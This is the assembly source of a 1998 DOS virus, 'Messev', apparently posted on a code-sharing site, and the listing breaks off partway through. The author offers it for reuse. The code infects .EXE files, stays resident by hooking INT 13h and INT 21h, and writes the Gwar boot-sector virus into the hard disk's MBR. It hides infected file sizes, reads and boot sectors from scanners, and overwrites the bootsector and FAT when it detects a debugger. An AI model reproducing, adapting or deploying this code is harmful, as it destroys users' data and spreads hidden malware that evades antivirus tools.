📄 messev.asm
字号:
;============================================================================
;
; NAME: Messev v1.00
; TYPE: Parasitic resident full stealth .EXE-infector.
; PURPOSE: Designed to drop the [Gwar v1.10] bootsector-virus.
; SIZE: Over 2776 bytes.
; AUTHOR: T-2000 / Invaders.
; DATE: March 1998 / May 1998.
;
; Capabilities:
;
; - Tunneling on INT 13h and INT 21h.
; - Variable encrypting.
; - Full stealth, (SFT-stealth however...).
; - Drops bootsector-virus.
; - Hides bootsectors/MBRs infected with Gwar.
; - Completely invisible for TBSCAN (adds parameters, uses INTs).
; - Anti-tracer: detects tracers (trashes bootsector).
; - Disables stealth on execution archivers (works with PKZIP).
; - Anti-debugging tricks.
;
;
; PROBLEMS:
;
; There are still some things to do, like:
;
; - Stealth filereads without SFT's.
; - Determination of system-handles via IOCTL (function 44h). *DONE*
; - Dummy-critical errorhandler. *DONE*
;
; BUGS:
; - DEBUG crashes on exit after port-access.
; - Stack isn't right in carrier. *FIXED*
; - ARJ exits with a Divide Error. *FIXED*
; - The SBB causes some programs to crash (see above), despite
; that it is correct. (fixed by removal).
; - Invircible terminates with a runtime-error, this is caused
; by hooking function 4301h (set file attributes).
;
; Can somebody tell me why the port-access is screwing things up?
; It'sa real pain in mah ass!
;
;
;
;
; Structure: HOST + PADDING + VIRUS + PADDING + HEADER.
;
; This virus is dedicated to a very pretty woman who was on Dutch television,
; called 'Gallyon van Vessem'.
;
; Since the stupid AV'ers don't assign a person's name to a virus, this
; one is not officially called 'Gallyon'. Instead 'Messev'.
;
; Stealth-marker is 60 seconds.
;
; Passes sanity-checks in anti-virus programs.
;
; When I got ready with Gwar, I've decided build it inside a file-infector,
; (nobody boots from a diskette nowadays). At first I thought of a Tai-Pan-
; hack, later I decided to write my own. It turned out to be the most stealth
; virus I ever programmed.
;
; Some things were removed to make the virus a little more smaller:
;
; - Zero-track hiding.
;
; Scanner detection:
; - TbScan : Only the T-flag (invalid timestamp).
; - F-Prot : Possible variant of Desperado (dis is not a hack Goddammit!)
;
;
; Some parts may look a bit messy, this is due optimization.
; Also excuse me if there is some bad English in this source.
;
; My E-Mail: T2000_@HotMail.Com
;
; To whoever who has dis source: U can do with it whatever U want:
;
; - Modify it, (just give me credit)
; - Publish it,
; - Stick it where da sun doesn't shine.
;
; LAST REMARKS: I hope 2B on #VIRUS very soon!
;
;============================================================================
.MODEL TINY
.STACK 4096
.CODE
ORG 0
Virus_Size EQU OFFSET Virus_End - OFFSET Virus_Begin
Virus_Mem_Size EQU ((Virus_Size * 2) / 16) + (128 / 16)
Marker_Mem EQU 921Fh
Marker_File EQU 0F0B1h
Residency_Check EQU 0DCD0h
Bios EQU 13h
Dos EQU 21h
Virus_Begin:
Gwar_Boot: INCLUDE GWAR.ASM ; Bootsector-virus.
Entry:
CLI ; Detect if a tracer is used.
PUSH AX
POP AX
DEC SP
DEC SP
POP BX
STI
CMP AX, BX ; Word correct?
JE Not_Traced ; Then continue execution.
; === Our retaliation ===
Trash_RAM:
MOV Trace_Mode, Bios ; Find BIOS-entrypoint.
CALL Tracer
MOV AX, 0301h ; Trash bootsector & part
MOV CX, 01h ; of FAT with garbage.
MOV DX, 0180h ; (don't hurt our child).
CALL BiosInt
INT 19h ; Reboot system.
Not_Traced:
MOV AX, Residency_Check ; Call residency-check.
INT 21h
CMP AX, Marker_Mem ; Are we already TSR?
JNE Make_Resident
Exec_Host:
CALL Pop_All
MOV AX, ES
ADD AX, 10h ; Plus PSP.
ADD CS:Old_Entry+2, AX ; Add effective segment.
ADD AX, CS:Old_Stack+2 ; Plus old SS.
CLI
MOV SS, AX ; Restore stack.
MOV SP, CS:Old_Stack
STI
;IN AL, 21h ; Unlock keyboard.
;AND AL, NOT 02h
;OUT 21h, AL
XOR AX, AX ; Clear AX.
JMP DWORD PTR CS:Old_Entry ; JMP to host.
Make_Resident:
MOV AH, 62h ; Get PSP, (screws some
INT 21h ; debuggers).
DEC BX ; Get our MCB.
MOV DS, BX
CMP BYTE PTR DS:[0], 'Z' ; We want the last MCB.
JNE Exec_Host ; Don't install when not.
SUB WORD PTR DS:[03h], Virus_Mem_Size
SUB WORD PTR DS:[12h], Virus_Mem_Size
MOV ES, DS:[12h]
PUSH CS
POP DS
CLD ; Copy virus to high-mem.
XOR SI, SI
XOR DI, DI
MOV CX, Virus_Size
REP MOVSB
MOV AX, OFFSET Relocated2
PUSH ES ; JMP to relocated virus.
PUSH AX
RETF
DB '=[ Messev v1.00, (c) 1998 by T-2000 / Invaders ]='
Relocated2:
PUSH CS
POP DS
; Status: Bits
;
; 0 Infect mode.
; 1 Filesize stealth mode.
; 2 Read-stealth mode.
;
MOV Status, 00000011b
MOV AX, 3000h ; Get DOS-version (OEM).
INT 21h
CMP BH, 0FFh ; Microsoft MS-DOS?
JE SFT_Supported
CMP BH, 0EEh ; Digital Research DR-DOS?
JNE No_SFTs
SFT_Supported: OR Status, 00000100b ; Read-stealth enabled.
No_SFTs:
MOV AL, Status ; Save initial status.
MOV Init_Status, AL
MOV Trace_Mode, Dos ; Find DOS-entrypoint.
CALL Tracer
MOV Trace_Mode, Bios ; Find BIOS-entrypoint.
CALL Tracer
MOV AL, 13h ; Hook INT 13h.
MOV BX, OFFSET Stealth_Int13h ; Stealth-handler for MBR.
MOV CX, CS
CALL SetInt
CALL Gwar_Dropper ; Install our lil' present.
NOP ; Leave dis here!
MOV AL, 21h ; Hook INT 21h.
MOV BX, OFFSET NewInt21h
MOV CX, CS
CALL SetInt
JMP Exec_Host
; See if Gwar is already installed, or else install.
; Because we use the tunnelled vector, we can read beyond Gwar's stealth.
Gwar_Dropper:
; Delete port-access driver, so Gwar can infect under Win95. (Same method
; as used in Hare virus).
MOV AH, 41h ; Delete driver.
MOV DX, OFFSET Port_Driver
CALL DosInt
MOV AX, Marker_Mem_Gwar ; Gwar residency-check.
INT 13h
CMP AX, NOT Marker_Mem_Gwar ; Gwar resident?
JE Exit_Installer ; If so, don't install.
MOV AH, 0Dh ; Reset harddisk.
MOV DL, 80h
CALL BiosInt
POP BX ; POP return address to BX.
PUSH BX ; PUSH it back.
MOV BYTE PTR [BX], 90h ; Remove breakpoint.
MOV AX, 0201h ; Read MBR of 1st harddisk.
MOV BX, OFFSET Buffer
MOV CX, 01h
MOV DX, 80h
CALL BiosInt
JC Exit_Installer
CMP [BX+Signature], Marker_Boot ; Already infected?
JE Exit_Installer ; Then abort drop.
MOV AX, 0301h ; Store original MBR.
MOV CX, 02h
MOV DX, 80h
CALL BiosInt
JC Exit_Installer
MOV AX, 0301h ; Write Gwar to MBR.
MOV BX, OFFSET Gwar_Boot
MOV CX, 01h
MOV DX, 80h
CALL BiosInt
Exit_Installer:
RETN
Stealth_Int13h:
CMP AH, 02h ; Read?
JNE JMP_Int13h
OR DH, DH ; Zero-head.
JNZ JMP_Int13h
CMP CX, 01h ; Bootsector?
JNE JMP_Int13h
CALL BiosInt ; Execute function.
CALL Push_All
JC Exit_Stealth_i13h ; Exit if error occurred.
CMP ES:[BX+Signature], Marker_Boot
JNE Exit_Stealth_i13h
MOV AX, 0201h ; Read original bootsector.
MOV CX, ES:[BX+Stored_TS]
MOV DX, ES:[BX+Stored_HD]
CALL BiosInt
Exit_Stealth_i13h:
CALL Pop_All
RETF 2
JMP_Int13h: JMP DWORD PTR CS:Int13h
; <=== S T E A L T H R O U T I N E S ===>
Stealth_Filesize_FCB:
CALL DosInt
CALL Push_All
TEST CS:Status, 00000010b
JZ Error_FCB
OR AL, AL ; Error?
JNZ Error_FCB
MOV AH, 2Fh ; Get DTA-address.
CALL DosInt
CMP BYTE PTR ES:[BX], 0FFh ; Extended FCB?
JNE Normal_FCB
ADD BX, 7 ; Skip extended stuff.
Normal_FCB: MOV AL, ES:[BX+17h]
AND AL, 00011111b ; Infected stamp?
CMP AL, 00011110b
JNE Error_FCB
AND BYTE PTR ES:[BX+17h], 11100000b
SUB WORD PTR ES:[BX+1Dh], (Virus_Size + 16 + 24)
SBB WORD PTR ES:[BX+1Fh], 0
Error_FCB:
CALL Pop_All
RETF 2
; Subtract the virussize from infected files' length & clear 60 seconds.
Stealth_Filesize:
CALL DosInt ; Execute function.
CALL Push_All
JC No_Filesize_Stealth ; Abort when error.
TEST CS:Status, 00000010b
JZ No_Filesize_Stealth ; No, then abort.
MOV AH, 2Fh ; Get DTA-address.
CALL DosInt
MOV AL, ES:[BX+16h] ; Get seconds-field.
AND AL, 00011111b ; Mask seconds.
CMP AL, 00011110b ; Equal to 60 seconds?
JNE No_Filesize_Stealth ; No stealth when not.
AND BYTE PTR ES:[BX+16h], 11100000b ; 0 seconds.
SUB WORD PTR ES:[BX+1Ah], (Virus_Size + 16 + 24)
SBB WORD PTR ES:[BX+1Ch], 0
No_Filesize_Stealth:
CALL Pop_All
RETF 2 ; Return 2 caller.
; Prevents readings after virtual file & redirect readings from header.
Stealth_File_Read:
CALL Push_All
MOV CS:Read_Buffer, DS
TEST CS:Status, 00000100b ; Can we use SFT-stealth?
JZ JMP_No_Stealth
MOV CS:Read_Bytes, CX ; Save # of bytes to read.
MOV CS:Read_Buffer+2, DX
CALL Check_Handle ; Dis is a filehandle?
JNZ JMP_No_Stealth ; Abort when it isn't.
CALL Check_Stamp ; Infected timestamp?
JZ Stealth_Read
JMP_No_Stealth: JMP No_Stealth_Read
Stealth_Read:
CALL Get_DCB ; Get the SFT-address.
MOV AX, ES:[DI+17h] ; Pos. before read hi.
MOV CS:File_Pos, AX
MOV AX, ES:[DI+15h] ; Pos. before read lo.
MOV CS:File_Pos+2, AX
SUB WORD PTR ES:[DI+11h], (Virus_Size + 16 + 24)
SBB WORD PTR ES:[DI+13h], 0
CALL Pop_All
CALL DosInt ; Execute function.
CALL Push_All
JC Abort_Stealth ; Abort when error.
CALL Get_DCB
ADD WORD PTR ES:[DI+11h], (Virus_Size + 16 + 24)
ADC WORD PTR ES:[DI+13h], 0
PUSH CS
POP DS
CMP File_Pos, 0 ; Reading 1st 64k?
JNZ Abort_Stealth ; Abort when not.
CMP File_Pos+2, 24 ; Reading header?
JA Abort_Stealth ; Abort when not.
CALL Save_File_Pos
CALL Go_End_File ; Go to position of old
SUB AX, 24 ; header at end of file.
SBB DX, 0
ADD AX, File_Pos+2 ; Pos in header.
ADC DX, 0
MOV ES:[DI+17h], DX ; Pos. old header.
MOV ES:[DI+15h], AX ; Pos. old header.
MOV AH, 3Fh ; Read original header
MOV CX, 24 ; into caller's buffer.
SUB CX, File_Pos+2
MOV DX, Read_Buffer+2
MOV DS, Read_Buffer
CALL DosInt
CALL Restore_File_Pos
Abort_Stealth:
CALL Pop_All
RETF 2 ; Return to caller.
No_Stealth_Read:
CALL Pop_All
JMP Continue
; Prevents lseeks beyond virtual file.
Stealth_Fileseek:
CALL Push_All
TEST CS:Status, 00000100b ; Readstealth?
JZ No_Stealth_lseek
CALL Check_Stamp ; Infected stamp?
JNZ No_Stealth_Lseek
CALL Get_DCB
SUB WORD PTR ES:[DI+11h], (Virus_Size + 16 + 24)
SBB WORD PTR ES:[DI+13h], 0
CALL Pop_All
CALL DosInt ; Execute function.
CALL Push_All
CALL Get_DCB
ADD WORD PTR ES:[DI+11h], (Virus_Size + 16 + 24)
ADC WORD PTR ES:[DI+13h], 0
CALL Pop_All
RETF 2
No_Stealth_lseek:
CALL Pop_All
JMP Continue
; DS:DX = Filename.
Clean_By_File:
CALL Push_All
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -